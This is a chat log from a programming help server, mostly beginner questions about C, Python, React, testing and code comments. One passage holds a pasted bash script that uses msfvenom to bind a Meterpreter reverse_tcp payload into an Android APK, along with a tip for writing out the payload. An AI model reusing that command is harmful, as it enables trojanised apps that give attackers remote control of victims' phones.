somone can help me? im try to do a program that take 10 names from the user and check if its panagram.. its mean all them have all the a b c d inside.. somone know how to do it?

and sorry about my english

It's possible to write them in C++ then use them with the regular C programs, but it would be unusual. That's about as good as you get.

The implication is that basically all the letters will be not in every word in the whole sentence

I wrote a python program to solve this specific problem. It works fine for small numbers but is not giving any output for 14351. Can anyone have a look at my code and explain to me why it is not working? Thank You ^_^

Here's my code

For some reason i keep getting the same error My Code: if s == "y": Error: SyntaxError: invalid syntax the ^ symbol is under the :

Must be for something above that line

can you send the code?

it's on my pi so im gonna send half of it maybe less

okay

    if os.path.exists(FileName):
        s = raw_input("File exists you want to overwite?(y/n): "

        if s == "y":
            print("oke")```

Are you missing a closing parenthesis on raw_input line?

XD yes

thank you

@wispy tusk if temp is num, here's your problem

is is not for equality, it's to see if it's the same object.
Use ==

@lilac holly In what language?

c

What do you have so far?

wdym

What is your progress thus far?

I have an array and I pick up 10 strings and I'm trying to figure out what conditions I need to do

Is it just the normal alphabet?

is is equivalent to using == when comparing two integer or string or floats as they are immutable objects. So a=4 , b=4, a==b will always return true as both of their ids point to the same object unlike mutable objects

That advice, in python, directly goes against PEP8 standards

It's also slower

You cannot compare it like that. Put it in a variable and then check

I ran it with your code and that's why it's breaking

The second I changed your is to ==, it worked

Standards are set for a reason

is None is faster and it's what pep8 specifies.

He's not comparing it to None though

He is comparing two integers

Ok more coffee

Man, I thought I needed more coffee for a second 😂

Oh okay....but it shouldn't be the reason to break my code because == is equivalent to is unless we compare two lists

Nah, is and == are equivalent for integers only within a certain range, I don't remember what range though.

Oh.... gotcha!.. Thanks

Found it. Apparently it's the range [-5, 256] because:
The reason for this being that Python automatically creates those integers prior to runtime rather than constructing them on the fly in order to save time, and thus these particular integers have ids before being needed in the program (https://stackoverflow.com/a/2239753)

@wispy tusk Also, all prime numbers apart from 2 are odd. So if you put 2 in your prime list and then start your loop at 3, incrementing by 2, it will save time.

primes = []
for i in range (2, num):
    if prime(i): primes.append(i)

primes = [2]
for i in range (3, num, 2):
    if prime(i): primes.append(i)

yes

Great idea! Thanks for the suggestion 😀

Also if you want a challenge it's trivially parallel

@wispy tusk is compares to a canonical object, == compares contents.

@lilac holly Fill an array with 0's for each character (a = 0, b = 1, ... ), loop through the chars in a string and then increment the corresponding index in the array (so if the character is 'a', increment index 0). At the end of all strings, loop through the array and if a value anywhere is still 0, it hasn't been used and therefore, it isn't a pangram.

Thanks

Nice idea

Thanks. I got it.😊

Keep capitalization in mind!

Are there any limitations like this while comparing two strings using 'is'?

@distant shard hmm can i do in the array variable?

sorry for my english

like int and float.. can i put in the array?

Strings are registered into a canonical list as they are used - every time a string literal is used, it gets looked up in the canonical list and either added or referenced to save time IIRC

Might be getting language specific VMs mixed up though

@lilac holly What do you mean?

`#Bind Payload
read -p "[]Enter Original APK Path#~: " path
read -p "[]Enter Output APK Name#~: " payload
read -p "[]Enter lhost#~: " lhost
read -p "[]Enter lport#~: " lport
echo -e "\e[31m[*]Payload Binder Started..;p\e[0m"
msfvenom -x $path -a dalvik --platform android -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport R> $payload.apk

#Msfconsole listner start
echo -e "\e[34m \e[2m";`
this little script binds a reverse tcp payload to an apk file
it also signs the app
but i have no idea how does it sign it
cuz i can't find anything related to signing in the code above
any idea?

like arr[10]={int a = 0; int b =0;}

int arr[10] = {0}

@thin lynx piping the output of msfvenom to a file like that hurts me in my soul.

Use -o

Because otherwise binary payloads often get cut short

do u see anything related to signing on this code?

i'm wonder how does it work?!

I did not understand how I was supposed to do this .. Can you send me an example?@distant shard

I'd say it's somewhat related to the original APK but I don't think you should be able to modify it and keep it signed

@lilac holly The alphabet has 26 letters so initialize an integer array of length 26 and fill it with zeroes.
Now, loop over your string. I will use "abc" as an example. 'a' is going to be the letter at index 0 of the array, 'b' is going to be 2, ...
Find a way to get 0 from 'a', 1 from 'b'.
If you get 'a', increment arr[0]
If you get 'b', increment arr[1]
...
At the end of your string, loop over your array and check if any position is 0. If it is, the character wasn't used and therefore not a pangram.

that's not mine James
you can see the complete code here
https://github.com/TechBite-BD/Embedded-Apk/blob/master/embedded-apk.sh
it signed the app after infection
but i can't see anything related to signing in that code
i'm wonder how does it sign the app?!

ok thank you

Null bytes are meanies

EOF>Null

That byte is pretty mean as well

Hey, i had a question in Bash about errors

how do i pop up an error if i pass more than required arguements

Only guessing, maybe try and access 1 more than the arguments required, if it has a value there's too many arguments?

yeaah that works wanted to also ask if there is a more efficient way

but thanks a lot for the tip

i will do that

https://stackoverflow.com/questions/18568706/check-number-of-arguments-passed-to-a-bash-script

ohh thanks a lot

this worked

my code isn't working and i'm sad :((((((((((((

if anyone wants to vc to help me fix this i would appreciate xx

i cannot explain over text

this is in react btw

but is just a standard js issue

my code also isnt working

snap

https://cdn.discordapp.com/attachments/799672834241986620/805221909339176960/unknown.png

https://cdn.discordapp.com/attachments/799672834241986620/805221939270254652/unknown.png

line 25 confirms there is no image

yet line 28 is still executed (but not 27)

but also the whole else statement is running

why ????????

i am simply going crazy

compiler optimization?

sorry, I don't know enough about React other than I can never get it working properly

I really should do my work but I really want to help >.<

Help then

Whee, feels good when one of your pull requests gets merged!

Ok it was a bit of doc that anyone could have done

Whoa! Do I hear negativity!? I do not see anyone else doing that "bit of doc" so clearly they could not have 😎

jabba i hope you're okay 🙂

and college isn't too harsh

Bee my code is no longer beautiful and I am just accepting it.

It has destroyed me.

Is this good code coverage?

__init__
__main__

^^ that code only runs when:

if __name__ == "__main__"```

and is super short

You have a lot of code that doesn't have coverage. Are you doing this profiling for some compliance reasons?

its for a take-home coding interview test

I'm at 95% rn

ah

that's a pretty fair amount of code that isn't reachable - that'd be a fail in on the compliance checklist 🙂

a lot of the unreachable tests are caused by this

also stuff like this

@magic falcon do you happen to know how to fix the first error?

😦

i cant figure it out

hmm

i'd need more info - is that an actual error or a warning that the code isn't reachable?

I fixed it!

It's a "design decision"

it looks like it's a context run problem

http://mail.python.org/pipermail/python-3000/2007-April/006793.html

use python3 -m

instead of just python3

it will always be unreachable until you run it in the right user context, i think

if i am wrong, please share

you are right!

my last bit

before 100% CC

nice work!

@magic falcon do you think if i ignore that in code coverage they'd care? You can really only reach that when you run the program as an app (not a module like pytest is doing) and it works as main() is tested 😄

honestly? it's a contextual thing

I think it's more valuable to ask: 'am i mocking the main() call sufficiently in my test cases'

if it's a compliance requirement, it's not negotiable in that way. you can argue about scope of whether that particular line is within the scoped boundary of the security control, and depending on what kind of coffee the auditor had, it may be accepted

if you can make an inductive argument that main() is sufficiently tested elsewhere...

IIRC pytest has a mocktest lib that is supposed to simulate objects in your test cases. Super useful for decoupling into unit tests from system or integration tests

That's a very good argument, I think it'd be more worthwhile for me to discuss these -- the requirements they gave me were probably intentionally vague, im testing against live web-servers (google.co.uk) and i wanted to talk about deploying a web-server specifically to test against too 😄

how familiar are you with the differences between unit, system and integration tests?

unit vs integration yes

system is that the whole thing?

system is a test of the whole thing

ahhh okayyy

like other things as well

like an actual db

instead of mocking up responses

im only doing unit-testing rn, and i suppose system testing via Click running the whole thing from the API as well as manual testing 🙂

manual testing is teh suck

use mock 🙂

simulate all your front end button click() calls, don't actually do them

devsecops

ah i think that what im doing?

https://click.palletsprojects.com/en/7.x/testing/

maybe? not familiar with CliRunner

https://pypi.org/project/pytest-mock/

it essentially tests the program as if you was manually testing it from the CLI

mock takes it a step futher

basically you can drop in a fake call to anything and give an expected response

really helpful when building a multi-api dependent front end

because you don't actually need the other apis to exist, you can fake stuff like json really easily to know if your edge case coverage is sufficient

I'm gonna talk about how I should have done that

They're probably gonna ask me "what could you have improved?"

are you into the infra side of devsecops as well, or just the code part?

Hi, somone can help me with bubbleSort?

i need to use it in my program buy I dont know about bubbleSort

in c language

You do know what a bubble sort is right?

And what that sort particularly? It's slow and inefficient

Unless it's a homework assignment

Bubble sort is a general sorting algorithm.

There are many resources online which can give you the idea.

If the assignment is not restricted to only bubblesort, id suggest looking for algorithms with better time complexities.

Use quicksort

@brazen eagle its not homework im learning to test tomorrow and i dont know what is it bubbleSort..

If you don’t know what it’s for, and don’t have a strict requirement to use it, don’t use it.

https://youtube.com/playlist?list=PLuE79vNc5Wi6q34LsQcaJ7ISQ8uOyMaL_

Sorting algorithms as folk dances. Enjoy

please

help

how can my code possibly be executing both the if and else block simultaneously

normally it can't

are you absolutely certain the code in the if is executing

i posted on stack overflow

yes

if (oldCells[index].image) {
    console.log('Current cell already has an image, placing 7 cells before');
    oldCells[index - 7] = image;
} else {
    console.log('Current cell is empty, placing here');
    oldCells[index] = image;
}

normally javascript's hoisting doesn't affect variables in a different scope...

the WHOLE else block executes, but it is also executing second line in the if block (not the console.log)

unless you're getting some references crossed

i have no idea 🥺

Query for you awesome programmers.
Where do you place comments and what do you write?

I am stuck between writing comments when necessary to explain complicated/ possibly confusing sections OR writing comments to explain basically everything. I think I want to go with the first one but I would love to see what others do.

*I would like personal opinions, not documents on writing comments.

I document everything. Every function has a style guide standard documentation comment description, including expected behavior, return type, and parameters.

Part of why I do that is documentation builders will scrape through and add it to the doxygen, javadoc or sphinxdoc output.

Another (bigger) part of why i do that is i am unlikely to be the person who ends up doing the maintenance on that codebase. Making everything as clear as possible means that whoever ends up with governance over that code will have fewer problems maintaining it

self documenting code is a lie, because ultimately what makes a codebase usable is the documentation around it, no one wants to crawl through your library to figure out how to use your API

Check this out @distant shard , Reduced the time complexity even more by incorporating a slick trick ^_^

Woops

@magic falcon That's a great guideline. I'd also add that you should keep the code units (functions, methods etc) small enough for it to make easier to document them in a clear way.

@solar hull I'm a huge fan of BDD and TDD methodology for just that reason.

BDD, TDD and documenting your code requires discipline. But once you do that, your code is in general better and easier to maintain.

i think many agile practices aren't doing enough to enable long term care and feeding of the codebase..... but YMMV 🙂

A lot of them are more about process than quality 🙂

@wispy tusk Yeah! That's what I was trying to do as well. I misremembered the upper bound, I thought it was the square root of the number. I think that might have been for something else though. My cryptography course has been a while.
You forgot the increment by 2 in the for-loop. Should shave off a minuscule amount but it's something!

Not to mention the misuse and misinterpretation of agile practices.

In a lot of ways, I think the metrics go into many sprint-type practices are misleading. They are all about kanban cards completed, not how much effort each card actually takes

Thanks for pointing it out.

I've seen projects with "Story point is roughly this many days" guidelines, and with decimal story points.

That can help - sometimes it's impossible to know how many points a task should be worth until it's complete though. Decomposing a moderately sized monolithic legacy component isn't a deterministic task until it's almost done

@wispy tusk Considerable running time improvement! 8.365s to 2.274s for n = 67423

Also, don't forget to change the is to == ;)

Oh..dang..lol..how did I forget it?😂 I think I didn't save it yesterday

I figured to see if we could make it any faster. I couldn't figure out why my changes weren't doing anything. I've been editing the wrong file...

I got it down to 0.038s for 67423

Amazing!

The square root was for this!

I just applied it to the wrong thing

It was for the primality test

import math

def prime(number):
    if (number == 2 or number == 3): return True
    if (number <= 1 or number % 2 == 0 or number % 3 == 0): return False

    for i in range(5, int(math.sqrt(number)) + 1, 6):        
        if (number % i == 0 or number % (i + 2) == 0): return False
    
    return True

num = 67423
primes = [2]
end = (num + 1) // 2 + 1
for i in range (3, end, 2):
    if prime(i): primes.append(i)

# print(primes)

for i in primes:
    for j in primes:
        temp = i * j
        if temp == num: exit(f"\nThe equation is: {i} * {j} = {num}") 

Try that

That's pretty cool!

I bet this can be a great base to building a fast tool for solving rsa cryptography challanges in CTF's

I'd say so, yeah

There's a couple of good tools for that which use some libraries to make it much much much faster

@wispy tusk Made it faster. Shaved off a whole 0.01s by changing to this:

for i in primes:
    if (num % i != 0): continue
    exit(f"\nThe equation is: {i} * {int(num / i)} = {num}")

Are you doing any profiling on your code?

Nah, just a simple time command on Linux

Nothing fancy

the builtin python profiling tools will help you dial in where you should be spending optimization efforts

i can see a couple of places in your code that would likely benefit from it

Made a few changes here. This can shave off some more milliseconds I guess.
`
import math

def prime(number):
if (number <= 1 or number % 2 == 0 or number % 3 == 0): return False

for i in range(5, int(math.sqrt(number)) + 1, 6):        
    if (number % i == 0 or number % (i + 2) == 0): return False

return True

num = int(input("Enter the number : "))
primes = [2, 3, 5, 7]
end = (num + 1) // 2 + 1
for i in range (9, end, 2):
if prime(i): primes.append(i)
`

Starting the range from 9 makes sense as there are no numbers before it which can be divided by some other primes

Yup. I know. But it's really fun building a tool from scratch ^_^

@magic falcon Oh, most definitely. This isn't anything too serious. Just something to fiddle with.

The former

Though APIs should be thoroughly documented, internals aren't really supposed to be seen publicly. Though thorough testing and stuff helps document as well

@wispy tusk Got it down to 0.02s, I think we did a decent job to get it there from 8.37s

You can probably start your range at 11 tbh

9 and 10 will always return false